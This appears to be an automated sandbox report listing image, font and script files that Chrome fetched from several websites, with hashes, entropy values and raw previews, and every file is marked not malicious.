                                              Preview:google.maps.__gjsload__('common', function(_){var ija,mq,kja,lja,oja,nq,pja,rq,tq,wq,qja,rja,sja,tja,uja,Jq,wja,xja,Mq,Oq,Pq,Cja,Dja,Qq,Tq,Eja,Ija,Hja,Mja,Pja,zr,Ir,Jr,Sja,Lr,Tja,Uja,Vja,Wja,Xja,Yja,Zja,$ja,dka,eka,fka,gka,hka,Pr,Qr,ika,Rr,jka,Sr,kka,Tr,Wr,Yr,mka,nka,pka,oka,tka,uka,wka,Fs,yka,Aka,Cka,Qs,Gka,vt,Pka,Rka,Qka,Vka,Wka,Zka,$ka,ala,Zt,eu,fla,fu,iu,gla,ju,hla,mu,pla,Au,tla,Bu,ula,vla,xla,zla,yla,Bla,Ala,wla,Cla,Dla,Gu,Ela,kma,oma,qma,sma,Gma,ena,hna,lna,mna,una,vna,wna,xna,Bna,zna,xx,yx,Dna,Ena,Fna,Gna,Hq,Gq,mja,nja,yja,Aja,Bx,Fja,.Ina,qw,rw,Jna,pma,pw,sw,Jja,Kja,tma,Lja,Ex,Kna,Gx,Hx,Lna,Mna,Ona,Jx,Pna,Qna,Lx,Mx,Rna,Sna,Ox,Tna,Px,Una,Vna,Sx,Wna,Xna,Yna,Wx,Zna,$na,Yx,Zx,$x,ay,aoa,boa,coa,doa,aka,cka,ioa,joa,koa,loa,moa,ey,gw,poa,qoa,roa,rka,bs,toa,Mma,dna,Xma,Dka,Ks;_.jq=function(a){return!!a.handled};_.kq=function(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var d=c.slice();d.push.apply(d,arguments);return a.apply(this,d)}};._.hja=function(a,b){functio
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):11680
                                              Entropy (8bit):7.972314942811284
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4wa3SooILiXrGslh6mY0InZllQKW9RzEi7n9gn9/nvh+wCUG0iki+:K0wD/c+lvY0IZTQL9tv7k/npG+
                                              MD5:44E297A1FE992C64D2AD080D87C75ED4
                                              SHA1:07BB81ED3844ED777F9AF3049EEDFB5AB76A5181
                                              SHA-256:A74D9FCEA7DC9E0B830EEFB4BFB878F36A0B80FA4255C98C5701E5EB90F76BFD
                                              SHA-512:205F1A4215AD9CB3DFE25E227F39965941A3A55A02A2190AD0D938D3D6967D293A6DFF5C476538A8D561A5067071E4AF321EFF3F61B5D0730D31D602E2E3E428
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/uae-ministry-of-defense.png
                                              Preview:.PNG........IHDR.......P......N......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:SVG Scalable Vector Graphics image
                                              Category:dropped
                                              Size (bytes):6598
                                              Entropy (8bit):4.377993081789527
                                              Encrypted:false
                                              SSDEEP:96:UGyFnVFouNtS896k15Cg7+7zqREwSopLggyJ24jKcbc7s+aB983yoof:UGyD3NZ/tEMSiKs4M4+K983E
                                              MD5:8106487DB88358D45257B316DC1BD282
                                              SHA1:8A1023384BBF1D0823B75E50861385416A8313E0
                                              SHA-256:F34EBEB66A9BC2E7B5B5D0D7181B1A54521AB537ED6291312E8BD1DB8653A203
                                              SHA-512:C604EFD5C13526F968FB1E1F5F9A5A87F1B1BA1A9E33469D4971CBD6085C33C28717BB7563FAF17638FBC6C03AFE06A5D2CD35CC4276D379B10EAC5367E945E9
                                              Malicious:false
                                              Reputation:low
                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="116" height="116" viewBox="0 0 116 116">. <g id="Group_3" data-name="Group 3" transform="translate(-999.92 -1370.92)">. <path id="User" d="M23.168,0A23.168,23.168,0,1,1,0,23.168,23.168,23.168,0,0,1,23.168,0Z" transform="translate(1034.752 1405.752)"/>. <g id="Move" transform="translate(1000 1371)">. <path id="Inactive" d="M58,116a58.426,58.426,0,0,1-11.689-1.178,57.683,57.683,0,0,1-20.739-8.727A58.17,58.17,0,0,1,4.558,80.576a57.715,57.715,0,0,1-3.38-10.887,58.569,58.569,0,0,1,0-23.378A57.683,57.683,0,0,1,9.906,25.572,58.169,58.169,0,0,1,35.424,4.558a57.722,57.722,0,0,1,10.887-3.38,58.569,58.569,0,0,1,23.378,0A57.683,57.683,0,0,1,90.428,9.905a58.169,58.169,0,0,1,21.014,25.518,57.706,57.706,0,0,1,3.38,10.887,58.563,58.563,0,0,1,0,23.378,57.683,57.683,0,0,1-8.727,20.739,58.168,58.168,0,0,1-25.518,21.014,57.708,57.708,0,0,1-10.887,3.38A58.428,58.428,0,0,1,58,116ZM58,7.734A50.642,50.642,0,0,0,47.87,8.755,49.991,49.991,0,0,0,29.9,16.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 640x480, Scaling: [none]x[none], YUV color, decoders should clamp
                                              Category:downloaded
                                              Size (bytes):25256
                                              Entropy (8bit):7.990785391299864
                                              Encrypted:true
                                              SSDEEP:768:L3D4g3E5NXIarin9VOsHjpgUwb6lG2OfZ/TKPkq:L35E0jOsjSU6IQfluk
                                              MD5:717096AA0224BEA5D0881FBA3FAA9ADE
                                              SHA1:447ACFB774351966E441022D3D9CEF37755245BA
                                              SHA-256:F6CEA7238CA5E9357BD16AFE28393E0DA7385CA20DB45229701887E42CD405E4
                                              SHA-512:FDA37BEBFEAFFBCD9C7A4BB96C4F81853799F414F173DC6C2089EEC62EB0BC6F7C20BF92D0E1B796FB2EE19855C4B3AC8368D203D7AC2F42DFC9E093C04A6BCA
                                              Malicious:false
                                              Reputation:low
                                              URL:https://i.ytimg.com/vi_webp/kG5xyR1406I/sddefault.webp
                                              Preview:RIFF.b..WEBPVP8 .b.......*....>m4.H$".+.rZ.p..gn..i'....T..O./..............?A..~.zQ......._....`=..6.|..........'.......Oh..=....}..........g.?*7.........?.?......../N..t....}......_...v?..W...z.y..W..?.}...._...c..._.O..u?s...u.....S.T...aV.j...[...6.lv...U...aV.j...[...6.lv...U...aV.j...[...6.lv...U...aV.j...[.....~.g...|rZR......=.:n.1SR...bn.%.D.zD..........vl&k..c..(/.9<woWl.t.z.G.<..?zR..W.....y..]...w....i./.}.)..!T....L{..M.../...m...w...CK....zI.m@.. o.....b.M..d....<..1D...2......x?.i.5|..9...R@.m.N._..?.{.,.H.|.X._...?./B.)....`W..k...M...Z...........cF..n.;f..5..w.....;...E.7......b.P...d......e..Qp.)...c.....e.....K......b.kb...;Lg.......'l.xz..E,..A.qd..".mB"{.|V"\....w...7.f..=f_.....<.H...93.6X..C.Au.(q//.U.0-.c....n....=j..D4..q0.&a.JO.3..)....A.h).}.E....s.....v.\.z.P.....hz..kZ.on........%...F.+..U..., ......3#k..0.$..&aJD=....r..-.U..^..a.7.>..?)l-eD.K..r.g,L...sY.k..s8...p..L||..D..n<....>.|.G.k.8;..!...9..a`..G...p.u
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3697
                                              Entropy (8bit):7.916772166546737
                                              Encrypted:false
                                              SSDEEP:96:AHauHDnBpj6MWV1LeselTmsRLrAY7AZJ+Em9Y1:szHT6MkhedRXRwmAf+EmK1
                                              MD5:62F44CDC85F74A8C1473B3B522B7B358
                                              SHA1:C0AED0F3C4F5F8A7785938FBA89DACF5B5E4BA23
                                              SHA-256:3E19C336ED91C01777E25CBBFE85216567FA4D3D0FBDC056280C28E1E1E002F1
                                              SHA-512:C37F4479E27234B2AD76144585EB3CEB76388721901C57DC27A9715B648AB31D976B0DF0E2B10A2422421811357C648F423413DB13D6C2D0696AA08420B05CFF
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.......P.....9.......PLTE.................................................................................................................................UO.........7...8.1Q.+...j.%........PJ.@./H.-c.'f.&..................# .0,.Y.)m.$u."y.!......62.......D?....#.6s.#...............E..U.*].(.......x................@;.:6.DDD).54.2K.,....}....{s.........._X.................|.JD.+(.......pppWWW;;:...QM.GC....&$..........vm...............zp...........N.,}. ......;9.WR.]W........../,.......(%...f^.c[.........zzz^^^\\\0.3...c].sk..........c].FB....[U....WP...................eee`.'!! ...'&.53.A>.KG.......vn.ng.........................ia.....................RRRLLL000.../..kd.ri....me...............ttt<.0......JE.......pg.......lll.{@-.3D@.......?;..v. .......xs5+++...srjTR<tn,a.#...;...'tRNS..`..9...1#....g...v@..J...U+...o...........IDATh...gPTW...K.Q.F.{....e;.C.K...A...*]@.A....k.5....{.....d.s.2...=.......K......*/m,.d3)......J63~.......r..../..j..To....X.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):16355
                                              Entropy (8bit):7.7191585295920975
                                              Encrypted:false
                                              SSDEEP:384:4YNg7c3IvUkrEKvFg527en2jLgJgjudkq1507cp:4YyQGVFg5OgJKudkKmA
                                              MD5:41416DF74F2D9A35B29125B8E68702A6
                                              SHA1:D007E597BF6B8BADBAEA3786413486A0B0415C87
                                              SHA-256:241B4A65930A6A7FCC36ED0DBE7481B4B8F65BA835441248E42157B9D9ADF198
                                              SHA-512:94F3FE2F26B6F0CB1F1D983D081C7765605DA334AC9A77FD16AE8817F440BD1DC3B0E95AAA38230A6C40E8B346CC18FD0B72B047FFEEA5B0B043BEE1B0FB05C0
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4398
                                              Entropy (8bit):7.943004888753446
                                              Encrypted:false
                                              SSDEEP:96:NU6Wx5epPk72qUow3byxikCkRafb83jJxjMwpTk8o09FyFe/on29Umc:GDxIpMvUB+xfCsaf43/IoVlCo/o29Umc
                                              MD5:623B1A29D70CC525C5F07AD9E68F2855
                                              SHA1:117F1628A0E2F5FFF305FC2D750EB4184233F948
                                              SHA-256:D83A79A2DD50E946CBAE5737F3021DC2606C2891B843D11332B76EA93C6ACDC1
                                              SHA-512:3316399E5C4D0F1B7B20C0831FB32F661046C9E375EAD1DDACEFF8B6317E258F6FDD37799D86C0AA6CD8D9A120B36F2788106656DDB689E14337C17DD0943B3C
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef...PPLTE.............8N..n...2......c|.....,..................7R....."................\x....k...........7.w........s..g......4H..n.......'.......cz.....{......>W.....................c..*.....H........`..0........\.....9............]...<......j..D.........3F*..w.....5Tw.......evC.. ..3...AV.av.........^....T...x.{......D......IDATh..oo.J...2/..A.....4."...d.I..n....4.....c.o !iR.J...=m.d.y..?D..D.N.i].F.2*...Q.mK.Ti...u.tDTW.]..J%...|%T.L.Q.......1.$..<..<..!...SfS..L.}.c...C.(......<b..Pe.(.1....a.j....@..y..........R.iV5.C......6.......+ ..\.5.2L......6..P.&..=..*c..;E....\...]W{.qU.S+...}.B.Vo<..#8..~w..u..U.Py......I.5'..G}b..[...T...."..dU..r]...!......N.Mz<./....,.W ...TsUU./I...i.....s..>.*...9e.qi.A...ey....2*..........O7....C..FY.1..!6.$...(.*.t....wmWG.....:.B........1b....1I.~...!.<.#.Yi.R$PN.ei.n.0\..<..A..Uq4..U.AR.Y....{.5.L..a../eNPp.O...7.?.'.n.vu..HUK...4...~.....JU...z..YV'.BU..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):59298
                                              Entropy (8bit):7.995653812057102
                                              Encrypted:true
                                              SSDEEP:1536:XYS6+Y8Io837whQn2MSfTnCyxuPSQipivuvW9IFUcQ7Ww2vNA4BJ:XqdL9naLx0SQipiL9pO
                                              MD5:99000E6B2E8EDCF6B05E5099BBDC9300
                                              SHA1:D600BB8FB9597CADE90B7CFC1E05A7AD7FD7FE48
                                              SHA-256:A5D07D3F89FCDDF11567E19D914553D69DD8E3E765ABF8CDCD1A04682AE7BD46
                                              SHA-512:F4C29ABE7F612061DD63B45836C1994F1DCF9A711289AC3F76327D5F1374AC816BFEF811690938596FE84045EFD615138DB1F785E003B5528003EA2D63EA6096
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/20/712fe2efb37a4a3b2be6e91c62276b19.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 &....-...*....>.p.R.&.#.7.i ..gn......E..6.%.W.k..Z...N..r...:.e.....]Hq.....o......$..z3.y........?.?./.'.|._.............?..u......._...m....?...z.....>.P7.?...O...?.....|..........................o...............UUUUZ..wwwwwwwwwwwy..n..N.UW.t..........^'C...._.y..0..P..D./www..jn..>8..+....M.a...J....!.....V...........g..i.D*..l...%.6..`...=.A...!.....\:.r4...t..]q......n._...........GUUUUVX(7@.).mv$$.^..K..99z&A.c....gY.=._.......uUUUe...w...i..6=y.........-}?......2.,.`..{.pjD...&e......X(6..a|%.u..,...4...@..uUojfr.A.0....sAiP8D/,{-,.W,....S......h^X..=..................*....C32..3._....|.....,[......V4$.tD........G.7X-.m........>..:.......$..*.W.[..Pj..Gv...t..........'.j.t..d.. .i...-/...`.-.......7N.UY`....x.k,.r...[34.3..Z..... T{sE...VJ:..?u.Z..6..>.MCv......t.$.A..A.u..1C.L....""""..ybU..f^....!.0..6.u...Q.|.I~ft.........A...U{.+c....J...........UU-.n.....J../......uo&A.R.....3.)h\w.h.......
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:HTML document, ASCII text, with very long lines (23699)
                                              Category:downloaded
                                              Size (bytes):250764
                                              Entropy (8bit):5.304884774416847
                                              Encrypted:false
                                              SSDEEP:6144:Y4Y3yAyTI+bKlfno3Cq48a5LwsS4dkakd4dTb:Y4Y3yAyuok8a5
                                              MD5:3FEADD2E63DB755357A52A262275BF49
                                              SHA1:8E1C1CDE4E57C14131D9158D0A0A5D921C3C3865
                                              SHA-256:CC8BFF327A1DD8B167D9829A427E5FFC428C6F008A3612B8905F86F70D59431D
                                              SHA-512:7FECEBB62C52DA5E73CC7348227B4435DF1DF6206E7AC212194C5F3BEEBC573130832F99584BB67DE51FB7D39D04805599C0BB96EAA41BBC52ABE5DDD6E7DC6F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/js/plugins.js
                                              Preview:;window.Modernizr=function(a,b,c){function x(a){j.cssText=a}function y(a,b){return x(prefixes.join(a+";")+(b||""))}function z(a,b){return typeof a===b}function A(a,b){return!!~(""+a).indexOf(b)}function B(a,b){for(var d in a){var e=a[d];if(!A(e,"-")&&j[e]!==c)return b=="pfx"?e:!0}return!1}function C(a,b,d){for(var e in a){var f=b[a[e]];if(f!==c)return d===!1?a[e]:z(f,"function")?f.bind(d||b):f}return!1}function D(a,b,c){var d=a.charAt(0).toUpperCase()+a.slice(1),e=(a+" "+n.join(d+" ")+d).split(" ");return z(b,"string")||z(b,"undefined")?B(e,b):(e=(a+" "+o.join(d+" ")+d).split(" "),C(e,b,c))}var d="2.6.2",e={},f=!0,g=b.documentElement,h="modernizr",i=b.createElement(h),j=i.style,k,l={}.toString,m="Webkit Moz O ms",n=m.split(" "),o=m.toLowerCase().split(" "),p={},q={},r={},s=[],t=s.slice,u,v={}.hasOwnProperty,w;!z(v,"undefined")&&!z(v.call,"undefined")?w=function(a,b){return v.call(a,b)}:w=function(a,b){return b in a&&z(a.constructor.prototype[b],"undefined")},Function.prototype.bind||(F
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 150516, version 770.768
                                              Category:downloaded
                                              Size (bytes):150516
                                              Entropy (8bit):7.9968634709884325
                                              Encrypted:true
                                              SSDEEP:3072:yXkXWWv884hdyg2c/Hnyb62+5FjI9ftjp6qTNo3Bo:6kXQryg9/P2+5Etj5o3Bo
                                              MD5:328A9D0F59F0EBB55CDDAC6F39995BEA
                                              SHA1:C0E6E76B4A02C34656FF2A41B671E02F2821829B
                                              SHA-256:8F06540FD77F1EFFE1E2DA8EA10CEC4A382DDA9CC6EF05D816E1D6DE444072F2
                                              SHA-512:5B12555B07818D96107E9A4F692FC6C620BA9D0FCF6029E7883C7CD375A16C88061B388CD72754C1421D4683F3EB84C314A223FD9E51B8B2E5D431FB2AFE8312
                                              Malicious:false
                                              Reputation:low
                                              URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/webfonts/fa-solid-900.woff2
                                              Preview:wOF2......K...........K..........................8.$. .`..<........@..p. .w..Dp......aD.f./.Y...PUUUU5)!.1.v...*..O~.._..w..._..............K`pL.?L.v\...7../..{g..4....,.)4.....E8....0...1.....i;....s...J...57.AE.LT\6...../.}r.....L..%y.~..R....=....n.V.IqX......(.........t.D....s.}.5......u;.h.3..2...TE.'.P...8...!..r.. .`.....C..=U..[.<.....'.V.W..TR.d.$...K..X.-5N...=7.@^.>.%/..q/...}@.e.{.'S.....?...3}...`g.h[.......X@Q..J..:Ul.M...]........X.....Mw...N...\.i>]r.}.d......>.=...PXD. DB.%..DB.Y..k<.X..5Nc.K*..:.T.u%n.....g..g;.O..unw........1.o,.......A..H..m..M.,..L;.R..8M.i..JG.d.V.f......K..7..;]..<N.?...$K.d.1.95.rMI.....pq.3.Y.,q.........\x......=q.....F6...zf..It..aN...2qJ..AG.I..akoE...`........Ih..h(....k=....l..Q...$.5C48..4g..~US.:T.TB.d..[.l....s.;<...w.DQ...@.<...k...3..B.......I.{....R$......G....p.+.:..ph.F..<.O}.]....s[X..I...x.........9..${.....g..n..v.,V\@...-......V.Nf.5...c...Q.2...0.8j.Z...+.......33...!..!..C0w
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):12270
                                              Entropy (8bit):7.5678008595780835
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwT0M0LA5q1sO2Q3K98RjKOA2o49yY5lbbc89XydwU7vNr:4YNg7TV5Gvj6CI2yYPbfCDNr
                                              MD5:97DFEAE3F508B2F38E0669E00A951FB2
                                              SHA1:D5BAFA432BB14E0851DF3D1490E40ACC61451AA9
                                              SHA-256:7185FA419035D0132F2FDEC19C1A3F90D0643D412AD4461424557C582BCB852F
                                              SHA-512:D093B3389D0C954E1B16043446C8A9AECF90AE1FCD7D20558C471590684E639EF2753F0DFEA9E7EE31D705B67E09E66F34A4B01DAF72CD88B5E502AC0A85E62E
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 640x480, components 3
                                              Category:downloaded
                                              Size (bytes):69246
                                              Entropy (8bit):7.983299803065322
                                              Encrypted:false
                                              SSDEEP:1536:1d5k81dSGIE+P2McNvkeeUlmWFZyc18rFu8Pwi0WAxwsNVdPo:1Hk81fIE+LcmUl/FZyc1uv0WvV
                                              MD5:0D38DCDD7E472FE7D26A8CD79E79CF5B
                                              SHA1:512FEC365B086AB9FFC5BEADFE2F985BE3B5E1A7
                                              SHA-256:C4FEDFEB3F19F1B8D7DE1A834E938534EDF73CF3DDFC99D0A4E5E6020068AD0C
                                              SHA-512:BD6168B362F03A926F2C522DFD6831F4E5463E1A3005ABAB85B582A1990FD51B7C5E8FA6919785D3B7856828F3F6BCAEE27DA5C52A6C1470391F811351CF6216
                                              Malicious:false
                                              Reputation:low
                                              URL:https://i.ytimg.com/vi/xFzWNmILl40/sddefault.jpg
                                              Preview:......JFIF..........................................................................................................................................................."........................................Y........................!...1A."Qa2q...#BR....Tbr.........$3CS....4Ucst......5D.%d.....................................A........................!1..AQ."aq....2R......#B.3br....C.4S..$............?....(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B......(B.(P..P.B.!B.......R....._........<..S{..).T[..a.(Z.5.......<..\.T....._...OB...0..5...T.}....C.W...'....../.z.o...P..T..3.\O.%...j..q?...(.i~Wt(...a.(z.1.........v..........v........a.(../.........v..........v.v..wB.y
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3127
                                              Entropy (8bit):7.9015255874939
                                              Encrypted:false
                                              SSDEEP:48:ZyUCcssghV16KLlHcamTuEJCptzu+hnbLy/+VoR3VP/S03SqaIQhha:cBsg/LlHcamux8iLyWSVP/T3SqaRha
                                              MD5:6E6850BE094DE848AED71D7FFABD67A8
                                              SHA1:46AA32D76D1A2E4DBDEDAF484CD78E00A7186944
                                              SHA-256:A1FEDF3947D0626018D684CBEC17C4556B0B1B511B745DFE0B54869A80FFE09F
                                              SHA-512:8075A03CBF196FFA2208361500D8C8B6B435DABBDF29021D676EC381760315895C21C64EC4DF60D26B947AB0670BA91109DF1F2583EAA3C3AA91E858C1210D52
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/vps.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...............o...~....5.....2..l...}........|.k.....k...x.h...v./.........}.$...p.......w..<.................u......|.1..M......p.K...~......;...g....B..P..........Y.....).....c../..n...........=..Q.....8...d0Ax~rtp....r.}...tb..=.f...W.gK.sH.i0..D..b.lX....iA...........IDATh.Y.w.J.&<.. .......@EQ...S...r....?..@.A...f......;W.zE`.....&.,.#..;4|.:."...l.b.0".."............$..81..9.o.F..<AB1M..4.E.......$......A.$\VE..>.=..b.....^.D..{.y..%a.p.b.4I'..%..$H.....P$EP.A0H..t...I.|...9.S..H.7..A.(..8.+..H...,.$.".}...4..9R..!.fH8A?;>>>:.s.>H.....b.(:..y.....+..'hg.''.'.gRL...b........s1;l4fcR..rvr|.I...X......T=b.x.&....<I!I.......V.L"G.....<.H.V;..,....J..<d9B...<X...$H..$...I..M....<............q.I.Hdif..`..U.$]X.....3...fi.a9..r.[.|..'.vv....kH.Nk...Z.X....1..*..Ox._..:,&..daChH{.a.%.#..8v.a..xB]8.k.K.....x.4........3..9$...b....ew.DpoNo.....x.~}..d=1..4.nM......'.r.....$iI..<..F.O.E.h.l.mf......c..9*..k.v.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):3296
                                              Entropy (8bit):7.912496602554403
                                              Encrypted:false
                                              SSDEEP:96:hYf8M6JPw7oUnESgynOH98C+E4JTuDFT4i:U6JPXGE2n2yowTu5T4i
                                              MD5:72BEB8A4C5CBA56600C47FC0E100F43E
                                              SHA1:D07CCE1D70C2B20D40B30F44E6752A6A7FCC918B
                                              SHA-256:374232827CF1216F04FAD2A364273F02214B4F7DB715928A1B60A4E3BFFB1098
                                              SHA-512:E5EB4A51013CC9D70ECB2505CD3F72C5EB8D751F62366451F6CA4748F8872DF2A0EABEA6E9A8DEDDB28A2CE82694DD1AF6360547FB4D5714360FB0DD94D3B088
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...................................._h..........h]......Vp...K|.fb.cf..../....B..<..\m.5.....'..Px.................\f.......l\.kt......Zj..........'...........}.....C~..........Oq............^Y.Vu............V...J....).....:..8........ip....i..`^.u.......IDATh..}W.\..AQT..B.P...IC.0.4.1......g..*..{=..vlt.Z.....9{.!.../....r&C0..1,[i7........i_....q.4...3..`YY.g...(.'.CfH.!+/......g:....g.B......rKi.,a..I..|J.O2...D.m.9.}..g.G..+r(.(...;...h.._....g.g.(<....2..No?.7a!l.pr...Y.V...d...r.{.#.......d...W.@\..9..~NcA8a.......1.B.B....%....4..1....k..|..S...I'.+..N.......D.:Y]..`_..o..o...r.......,$...F.......i..<.....J....y.X..u.. H...vq._]B.z..(0......XG>.h%+.. dm.U`H.f\_F.....gg._.G...b..,...Gx[....m.c56%..tY.`N..g..-.%.V..uu.`X..(....Rn.2.'.5G....z\+..U..d.c..8....u...32k)N%..%...~.g`.;.A..Z..zb+.].Pr_n3.)O..#.v..x......|1..}.....(...V.ZH...Ka....Y.'I8A.................m.r.B..........<.:.+.dd.c.J...|0....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x640, components 3
                                              Category:dropped
                                              Size (bytes):67181
                                              Entropy (8bit):7.978619022217026
                                              Encrypted:false
                                              SSDEEP:1536:al5Wtf7lr9h6dHtoyGirFn+bqHYKhhSHBVZM4baF:2if7lr2dNoer1+bqHujbaF
                                              MD5:53857508B0DB6CF72E4B117F4F9FF03A
                                              SHA1:BC34F7C7404894DFAD7D17AEBE862EC3DE1430EB
                                              SHA-256:522A5EDE3562BE0EC04ABCC096B039F2599E7B439F3F977647F2021CBB527B33
                                              SHA-512:807F3D9217B1610142C32D69773A175DEE8C3CF8CE7AD897181D23F835B6472A8C38DABEC0F70CBDFF69CDA4203D245BAAB17D03F5204144BA16B3B141264886
                                              Malicious:false
                                              Reputation:low
                                              Preview:......JFIF...........................................'......'#*" "*#>1++1>H<9<HWNNWmhm................................'......'#*" "*#>1++1>H<9<HWNNWmhm.............."................................................. ...K?SB....8Y..HrG+.Y$c.b...j....q.f.;..C.!.H....JR..B3#72...I.:I$.2gwtF......HB:...u.Z.....Y...Y.4..."cL.E,.{.w#..S$...Op.NfE!..".mWD..D.2LI."rD...`$.. ..\..5+.c...[.....~C7#r...}4..'4N.&d....9....9...._N..$I&I'D.......X....p..x ...U.R.!...W....$.?1.H.$.;$.:j..n........;.t....:t..N.I..:...qE..E.p.u.e.IH.Y.."...9'~[.4I......T............:t...I.D....:w\..B.1..QE.Q.}.&.I\.,.t...;.....a..&L.Y.J.?.9.........B4N..:I'gI....r't.\.9.f..8.(...f..3'M._LDY.......;2.fd.e.u...F.../A..:I:N.:N....4N..s....c.q.Q....$..$..j.".....]q:I2aafd.3z."'#rswt.Ozi.t..I$.:wD....'\......8.8..7...9....."."$d..\D.B...,.X...wr7'swu[...;.I.H.N.$H...'N.wwd..F0..*w&.IL..........?'.:t. B,.X..9;......C....I.N.N.$Ln..H.:.M.$.XD@#..vIe##t.f...F....$....'.O.''"F....r..t."N.$..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
